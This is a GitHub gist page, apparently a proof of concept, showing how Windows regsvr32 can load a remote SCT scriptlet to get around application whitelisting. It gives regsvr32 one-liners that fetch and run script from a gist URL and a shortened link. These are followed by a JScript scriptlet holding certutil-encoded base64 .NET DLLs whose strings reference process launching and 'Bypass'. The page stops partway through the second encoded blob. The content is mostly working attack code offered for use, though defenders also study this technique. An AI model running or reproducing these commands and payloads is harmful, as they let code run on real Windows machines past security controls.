Create a gist now

Instantly share code, notes, and snippets.

@subTee /command.txt Secret
Last active Dec 26, 2016

JS Delivery via SCT
regsvr32.exe /s /n /u /i:https://gist.githubusercontent.com/subTee/3610a16a54bcbc1fe0ebc46313f5c02e/raw/d07ff7974c09e5b9395ffcc71b49c8d12351db1c/jsdelivery.sct scrobj.dll
[OR]
regsvr32.exe /s /u /i:https://goo.gl/L4brce scrobj.dll
;-)
Tested on Windows 10 - Requires .NET 4.5.2
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
var fsoForReading = 1;
var fsoForWriting = 2;
// Reference MSDN https://msdn.microsoft.com/en-us/library/aa265347(v=vs.60).aspx
function sleep(delay)
{
var start = new Date().getTime();
while (new Date().getTime() < start + delay);
}
function LoadStringFromFile(filename)
{
var fso, f, data;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.OpenTextFile(filename, fsoForReading, true);
data = f.ReadAll();
f.Close();
return data;
}
function SaveStringToFile(filename, textString)
{
var fso, f;
fso = new ActiveXObject("Scripting.FileSystemObject");
f = fso.OpenTextFile(filename, fsoForWriting, true);
f.Write(textString);
f.Close();
}
// Example File Prep
// Output of 'certuil.exe /encode AllTheThingsx64.dll AllTheThingsx64.txt
// Why bother writing a terrible Base64 encode/decode routine, when certutil.exe will do it for you.
//
var x86dllEncoded = "-----BEGIN CERTIFICATE-----\
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v\
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAOHMhlcAAAAA\
AAAAAOAAAiELAQsAABAAAAAIAAAAAAAAri8AAAAgAAAAQAAAAAAAEAAgAAAAAgAA\
BAAAAAAAAAAEAAAAAAAAAACgAAAABAAA4lMAAAMAQIUAABAAABAAAAAAEAAAEAAA\
AAAAABAAAAAQQAAAKAAAAFwvAABPAAAAAGAAAJgDAAAAAAAAAAAAAAAAAAAAAAAA\
AIAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA\
tA8AAAAgAAAAEAAAAAQAAAAAAAAAAAAAAAAAACAAAGAuc2RhdGEAALUAAAAAQAAA\
AAIAAAAUAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAACYAwAAAGAAAAAEAAAAFgAA\
AAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAAFAAAAACAAAAAAgAAABoAAAAAAAAAAAAA\
AAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAJAvAAAAAAAASAAAAAIABQCkIQAAcA0AAAoAAAAAAAAA\
AAAAAAAAAABQIAAAgAAAAAAAAAAAAAAAVC8AAAgAAAAAAAAAAAAAAAAAAAAAAAAA\
hIHoDzXS4EVt+OmRj4KK22zFVcxh8Z1crHcneIMoVmI11LDX84GEziV5BMQfeojp\
dugMDMrx7G2nUlsVQF6HMm961gFcNSrMcWokfoifYBZXqsXoUkE4fOqEMyqH4xol\
nZnusiIxOIjDDOokb20LnrrfWncFOXsHUnTWPEtTUzwucgEAAHAoEAAACioeAigR\
AAAKKl5zEgAACiVyTQAAcG8TAAAKKBQAAAomKh4CKBEAAAoqQnJfAABwKBAAAAoo\
AwAABioeAigWAAAKKkYCKBoAAApylQAAcCgQAAAKKkJyxQAAcCgQAAAKKAMAAAYq\
QnL7AABwKBAAAAooAwAABioaKAMAAAYqGigDAAAGKhooAwAABioaKAMAAAYqGigD\
AAAGKh4CKBEAAAoqOgIoEQAACgIWfQEAAAQqWnJBAQBwAnsBAAAEjCEAAAEoHQAA\
CioAAEJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAEQEAAAjfgAA\
sAQAAOwEAAAjU3RyaW5ncwAAAACcCQAAYAEAACNVUwD8CgAAEAAAACNHVUlEAAAA\
DAsAAGQCAAAjQmxvYgAAAAAAAAACAAABVxUAAAkAAAAA+iUzABYAAAEAAAAiAAAA\
BwAAAAEAAAARAAAABwAAAB0AAAAZAAAAAQAAAAQAAAAAAN0DAQAAAAAABgAqAAoA\
BgBQAAoACgCIAG4ACgCnAG4ACgC4AG4ABgDsANoABgADAdoABgAgAdoABgA/AdoA\
BgBYAdoABgBxAdoABgCMAdoABgDGAacBBgDaAacBBgDoAdoABgAfAgUCBgA/AjgC\
BgBGAjgCDgBrAlgCDgCJAlgCEgC0ApcCDgDUAr4CBgD9AuoCCgAJA24ABgAbA6cB\
BgAzA6cBBgBGA6cBCgBWA24ACgBrA24ABgB9A6cBBgCaA6cBBgC5AwoABgDJAzgC\
BgDPAzgCAAAAAAEAAAAAAAEAAQABABAA9wMAAEUAAQABAAEAEAD/AwAARQABAAMA\
AQAQAAYEAABVAAEABQABABAADQQAAGEAAQAHAAAAEAAUBAAARQABAAsAAQAQABwE\
IgRFAAEAEAAGAM0E1ADQIAAAAACWACkEswABANwgAAAAAIYYSgAGAAEA5CAAAAAA\
lgAuBLMAAQD8IAAAAACGGEoABgABAAQhAAAAAMYAMwS3AAEAFSEAAAAAhhhKAAYA\
AgAdIQAAAACGGEoABgACAC8hAAAAAJYASAQaAAIAQCEAAAAAlgBaBBoAAwBRIQAA\
AACGAC4EBgAEAFghAAAAAJYAagTCAAQAXyEAAAAAlgCVBM0ACABmIQAAAACWAKcE\
zQAIAG0hAAAAAJYAuwTNAAgAdCEAAAAAhhhKAAYACAB8IQAAAACGGEoABgAIAIsh\
AAAAAIYA0QTXAAgAAAABAD0EAAABAFYEAAABAFYEAAABAHUEAAACAHoEAAADAIAE\
AAAEAIwECQBKAAEAEQBKAAYAGQBKAAoAKQBKABAAMQBKABUAOQBKABUAQQBKABUA\
SQBKABUAUQBKABUAWQBKABUAYQBKABUAaQBKABAAcQBKABUAeQBKABUAgQBKABUA\
kQBOAhoAiQBKAAYAmQBKAAYAmQB8AhUAoQCRAh8AsQBKABAAqQBKAAYAyQBKACYA\
2QBKABUA4QBKACwAwQBKAAYA8QBKAAYA+QBKAAYAEQHWAzIALgAbAKUBLgB7ABUC\
LgALAH0BLgATAIYBLgAjAK4BLgArALQBLgAzAK4BLgA7AK4BLgBDAK4BLgBLALQB\
LgBTAMYBLgBbAK4BLgBjAK4BLgBrAN4BLgBzAAgCgwCrAEoAowC7AHoAowDLAJgA\
owBrAFAAowBjAEoAowDDAIMA4wDDAKEA4wBjAEoAAAHbAL0AIAHjAL0ABIAAAAEA\
AAAAAAAAAQAAANsA3AQAAAQAAAAAAAAAAAAAADgA7gMAAAAABAAAAAAAAAAAAAAA\
QQBuAAAAAAAEAAAAAAAAAAAAAAA4ADgCAAAAAAQAAAAAAAAAAAAAAEEAlwIAAAAA\
AAAAAAA8TW9kdWxlPgBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAENv\
bXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUALmN0b3IAUnVudGltZUNvbXBh\
dGliaWxpdHlBdHRyaWJ1dGUAU3lzdGVtLkVudGVycHJpc2VTZXJ2aWNlcwBBcHBs\
aWNhdGlvbkFjdGl2YXRpb25BdHRyaWJ1dGUAQWN0aXZhdGlvbk9wdGlvbgBBcHBs\
aWNhdGlvbkFjY2Vzc0NvbnRyb2xBdHRyaWJ1dGUAU3lzdGVtLlJlZmxlY3Rpb24A\
QXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmli\
dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbXBh\
bnlBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29w\
eXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFN5c3Rl\
bS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1\
aWRBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTeXN0ZW0u\
UnVudGltZS5WZXJzaW9uaW5nAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBTeXN0\
ZW0AT2JqZWN0AENvbnNvbGUAV3JpdGVMaW5lAFN5c3RlbS5EaWFnbm9zdGljcwBQ\
cm9jZXNzU3RhcnRJbmZvAHNldF9GaWxlTmFtZQBQcm9jZXNzAFN0YXJ0AFN5c3Rl\
bS5Db25maWd1cmF0aW9uLkluc3RhbGwASW5zdGFsbGVyAFN5c3RlbS5Db21wb25l\
bnRNb2RlbABSdW5JbnN0YWxsZXJBdHRyaWJ1dGUAU3lzdGVtLkNvbGxlY3Rpb25z\
AElEaWN0aW9uYXJ5AFNlcnZpY2VkQ29tcG9uZW50AENsYXNzSW50ZXJmYWNlQXR0\
cmlidXRlAENsYXNzSW50ZXJmYWNlVHlwZQBQcm9nSWRBdHRyaWJ1dGUAVHJhbnNh\
Y3Rpb25BdHRyaWJ1dGUAVHJhbnNhY3Rpb25PcHRpb24AQ29tUmVnaXN0ZXJGdW5j\
dGlvbkF0dHJpYnV0ZQBDb21VbnJlZ2lzdGVyRnVuY3Rpb25BdHRyaWJ1dGUAQ2Fs\
bENvbnZTdGRjYWxsAEludDMyAFN0cmluZwBGb3JtYXQAQWxsVGhlVGhpbmdzLmRs\
bABtc2NvcmxpYgBQcm9ncmFtAFRoaW5nMABUaGluZzEAQnlwYXNzAEV4cG9ydHMA\
VGhpbmcAc3ViVGVlAE1haW4ARXhlYwBVbmluc3RhbGwAc2F2ZWRTdGF0ZQBSZWdp\
c3RlckNsYXNzAGtleQBVblJlZ2lzdGVyQ2xhc3MARW50cnlQb2ludABod25kAGhp\
bnN0AGxwc3pDbWRMaW5lAG5DbWRTaG93AERsbFJlZ2lzdGVyU2VydmVyAERsbFVu\
cmVnaXN0ZXJTZXJ2ZXIARGxsR2V0Q2xhc3NPYmplY3QATnVtAEdldE1lc3NhZ2UA\
QWxsVGhlVGhpbmdzAAAAAABLSABlAGwAbABvACAARgByAG8AbQAgAE0AYQBpAG4A\
LgAuAC4ASQAgAEQAbwBuACcAdAAgAEQAbwAgAEEAbgB5AHQAaABpAG4AZwABEWMA\
YQBsAGMALgBlAHgAZQAANUgAZQBsAGwAbwAgAFQAaABlAHIAZQAgAEYAcgBvAG0A\
IABVAG4AaQBuAHMAdABhAGwAbAAAL0kAIABhAG0AIABhACAAYgBhAHMAaQBjACAA\
QwBPAE0AIABPAGIAagBlAGMAdAAANUkAIABzAGgAbwB1AGwAZABuACcAdAAgAHIA\
ZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQABRUkAIABzAGgAbwB1AGwAZABuACcA\
dAAgAHIAZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQAgAGUAaQB0AGgAZQByAC4A\
AR1OAHUAbQBiAGUAcgAgAGkAcwAgAHsAMAB9AC4AAAAJ8Vav4FuUQL1vc2zseC4f\
AAQgAQEIAyAAAQUgAQEREQQgAQECBCABAQ4EAAEBDgYAARJREk0FIAEBEWkFIAEB\
EXUFAAIODhwIt3pcVhk04IkIsD9ffxHVCjoFAQABAAApAQAkMzFEMkI5NjktNzYw\
OC00MjZFLTlEOEUtQTA5RkM5QTUxNjgwAAAIAQAAAAAAAAAUAQAPZGxsZ3Vlc3Qu\
QnlwYXNzAAAIAQADAAAAAAARAQAMc3VidGVlLlRoaW5nAAADAAABBSABARJdBAEA\
AAAKAAQggIEBGBgOCAYAACCAgQECBggDIAAOgKAAJAAABIAAAJQAAAAGAgAAACQA\
AFJTQTEABAAAAQABAAtBHWB3pyShpMmhh27dNvN38y6duzRQR/TmciyPJ/h+88d8\
BKkPZiL05SqFUOiem1RA1clLPfQDGGkN6RW9A/Ox3ZRd3Wq4fbyuaEKH0wj1jvR6\
NuTVSrVWdrM6PVDUpk9il+KRtY2aI/wshNozZdDlMONgVSgn/gvEND9mrNizCAEA\
CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAEAAAAAAAUB\
AAAAABEBAAxBbGxUaGVUaGluZ3MAABcBABJDb3B5cmlnaHQgwqkgIDIwMTYAACkB\
ACQwNTQ3ZmY0MC01MjU1LTQyYTItYmViNy0yZmYwZGJmN2QzYmEAAAwBAAcxLjAu\
MC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3\
b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjIAAAAAAAAAAAAAAP8l\
AEAAEAAAAAAAAAAAAAD/JQRAABAAAAAAAAAAAAAA/yUIQAAQAAAAAAAAAAAAAP8l\
DEAAEABAAAAEAAUAhC8AAAAAAAAAAAAAni8AAAAgAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAJAvAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8l\
ACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAGDAAABg0AAAYOAAAG\
AAAAAOHMhlcAAAAAo0AAAAAAAAAEAAAABAAAADhAAABIQAAAWEAAAB4vAAAuLwAA\
Pi8AAE4vAABgQAAAckAAAIRAAACYQAAAAwABAAIAAABEbGxHZXRDbGFzc09iamVj\
dABEbGxSZWdpc3RlclNlcnZlcgBEbGxVbnJlZ2lzdGVyU2VydmVyAEVudHJ5UG9p\
bnQAXEFsbFRoZVRoaW5ncy5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\
AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAA8AwAA\
AAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA\
vQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAA\
AAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEA\
bgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwA\
ZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0A\
bQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAA\
AAAAAEIADQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGwA\
bABUAGgAZQBUAGgAaQBuAGcAcwAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkA\
bwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQgARAAEASQBuAHQAZQByAG4AYQBsAE4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAABIABIA\
AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA\
dAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0A\
YQByAGsAcwAAAAAAAAAAAEoAEQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAAA6AA0A\
AQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbABsAFQAaABlAFQAaABpAG4A\
ZwBzAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4A\
MAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A\
bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAFAAAACA/MD9AP1A/\
sD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAA==\
-----END CERTIFICATE-----"
var x64dllEncoded = "-----BEGIN CERTIFICATE-----\
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v\
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYEALx/flcAAAAA\
AAAAAPAAIiALAgsAABAAAAAIAAAAAAAAni4AAAAgAAAAAACAAQAAAAAgAAAAAgAA\
BAAAAAAAAAAEAAAAAAAAAACgAAAABAAA3jMAAAMAQIUAAEAAAAAAAABAAAAAAAAA\
AAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAGEAAACgAAABILgAAUwAAAABgAACYAwAA\
AAAAAAAAAAAAAAAAAAAAAACAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAABAAAAAAAAAAAAAAABAgAABIAAAA\
AAAAAAAAAAAudGV4dAAAAKoOAAAAIAAAABAAAAAEAAAAAAAAAAAAAAAAAAAgAABg\
LnNkYXRhAAChAAAAAEAAAAACAAAAFAAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA\
mAMAAABgAAAABAAAABYAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAABAAAAAAgAAA\
AAIAAAAaAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAIAuAAAAAAAAAAAAAAAAAABIAAAAAgAFAIghAACQDAAA\
CAAAAAAAAAAAAAAAAAAAAGAgAACAAAAAAAAAAAAAAABALgAACAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAOhao1eKooGq53BL1Fbcu3p77QlcOUUVy/of55ks/6bI\
FLQyC2BriJt7OZg3IrSycnsaTdZypyTHYQcTY+CEChGhvOawFJc/zUHdTyRM8Ijj\
ceCAC86t3XzNum18Phy/AJFVevIeGQPdMoaJan0SJGkfPcXHZmnPS9ygFX/lkX8E\
LnIBAABwKBAAAAoqHgIoEQAACipecxIAAAolck0AAHBvEwAACigUAAAKJioeAigR\
AAAKKkJyXwAAcCgQAAAKKAMAAAYqHgIoFgAACipGAigaAAAKcpUAAHAoEAAACipC\
csUAAHAoEAAACigDAAAGKkJy+wAAcCgQAAAKKAMAAAYqGigDAAAGKhooAwAABioa\
KAMAAAYqGigDAAAGKh4CKBEAAAoqAAAAQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAz\
MTkAAAAABQBsAAAA5AMAACN+AABQBAAAqAQAACNTdHJpbmdzAAAAAPgIAABEAQAA\
I1VTADwKAAAQAAAAI0dVSUQAAABMCgAARAIAACNCbG9iAAAAAAAAAAIAAAFHFQAA\
CQAAAAD6JTMAFgAAAQAAACAAAAAGAAAADgAAAAcAAAAcAAAAFwAAAAEAAAAEAAAA\
AADJAwEAAAAAAAYAKgAKAAYAUAAKAAoAiABuAAoApwBuAAoAuABuAAYA7ADaAAYA\
AwHaAAYAIAHaAAYAPwHaAAYAWAHaAAYAcQHaAAYAjAHaAAYAxgGnAQYA2gGnAQYA\
6AHaAAYAHwIFAgYAPwI4AgYARgI4Ag4AawJYAg4AiQJYAhIAtAKXAg4A1AK+AgYA\
/QLqAgoACQNuAAYAGwOnAQYAMwOnAQYARgOnAQoAVgNuAAoAawNuAAYAfQOnAQYA\
mgOnAQYAuQMKAAAAAAABAAAAAAABAAEAAQAQAOMDAABFAAEAAQABABAA6wMAAEUA\
AQADAAEAEADyAwAAVQABAAUAAQAQAPkDAABhAAEABwAAABAAAAQAAEUAAQALAOAg\
AAAAAJYACASbAAEA7CAAAAAAhhhKAAYAAQD0IAAAAACWAA0EmwABAAwhAAAAAIYY\
SgAGAAEAFCEAAAAAxgASBJ8AAQAlIQAAAACGGEoABgACAC0hAAAAAIYYSgAGAAIA\
PyEAAAAAlgAnBBoAAgBQIQAAAACWADkEGgADAGEhAAAAAIYADQQGAAQAaCEAAAAA\
lgBJBKoABABvIQAAAACWAHQEtQAIAHYhAAAAAJYAhgS1AAgAfSEAAAAAhhhKAAYA\
CAAAAAEAHAQAAAEANQQAAAEANQQAAAEAVAQAAAIAWQQAAAMAXwQAAAQAawQJAEoA\
AQARAEoABgAZAEoACgApAEoAEAAxAEoAFQA5AEoAFQBBAEoAFQBJAEoAFQBRAEoA\
FQBZAEoAFQBhAEoAFQBpAEoAEABxAEoAFQB5AEoAFQCBAEoAFQCRAE4CGgCJAEoA\
BgCZAEoABgCZAHwCFQChAJECHwCxAEoAEACpAEoABgDJAEoAJgDZAEoAFQDhAEoA\
LADBAEoABgDxAEoABgD5AEoABgAuACMAjwEuAHsA9gEuAAsAXgEuABMAZwEuABsA\
hgEuACsAlQEuADMAjwEuADsAjwEuAEMAjwEuAEsAlQEuAFMApwEuAFsAjwEuAGMA\
jwEuAGsAvwEuAHMA6QGDAKsARACjALsAdACjAMMAfQCjAGsASgCjAMsAkgCjAGMA\
RAAAAdsApQAgAeMApQAEgAAAAQAAAAAAAAABAAAAvACaBAAABAAAAAAAAAAAAAAA\
MgDaAwAAAAAEAAAAAAAAAAAAAAA7AG4AAAAAAAQAAAAAAAAAAAAAADIAOAIAAAAA\
BAAAAAAAAAAAAAAAOwCXAgAAAAAAAAAAADxNb2R1bGU+AFN5c3RlbS5SdW50aW1l\
LkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0\
ZQAuY3RvcgBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uRW50\
ZXJwcmlzZVNlcnZpY2VzAEFwcGxpY2F0aW9uQWN0aXZhdGlvbkF0dHJpYnV0ZQBB\
Y3RpdmF0aW9uT3B0aW9uAEFwcGxpY2F0aW9uQWNjZXNzQ29udHJvbEF0dHJpYnV0\
ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2Vt\
Ymx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0\
cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RB\
dHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFk\
ZW1hcmtBdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAENv\
bVZpc2libGVBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJz\
aW9uQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVGFyZ2V0RnJh\
bWV3b3JrQXR0cmlidXRlAFN5c3RlbQBPYmplY3QAQ29uc29sZQBXcml0ZUxpbmUA\
U3lzdGVtLkRpYWdub3N0aWNzAFByb2Nlc3NTdGFydEluZm8Ac2V0X0ZpbGVOYW1l\
AFByb2Nlc3MAU3RhcnQAU3lzdGVtLkNvbmZpZ3VyYXRpb24uSW5zdGFsbABJbnN0\
YWxsZXIAU3lzdGVtLkNvbXBvbmVudE1vZGVsAFJ1bkluc3RhbGxlckF0dHJpYnV0\
ZQBTeXN0ZW0uQ29sbGVjdGlvbnMASURpY3Rpb25hcnkAU2VydmljZWRDb21wb25l\
bnQAQ2xhc3NJbnRlcmZhY2VBdHRyaWJ1dGUAQ2xhc3NJbnRlcmZhY2VUeXBlAFBy\
b2dJZEF0dHJpYnV0ZQBUcmFuc2FjdGlvbkF0dHJpYnV0ZQBUcmFuc2FjdGlvbk9w\
dGlvbgBDb21SZWdpc3RlckZ1bmN0aW9uQXR0cmlidXRlAENvbVVucmVnaXN0ZXJG\
dW5jdGlvbkF0dHJpYnV0ZQBDYWxsQ29udlN0ZGNhbGwAQWxsVGhlVGhpbmdzLmRs\
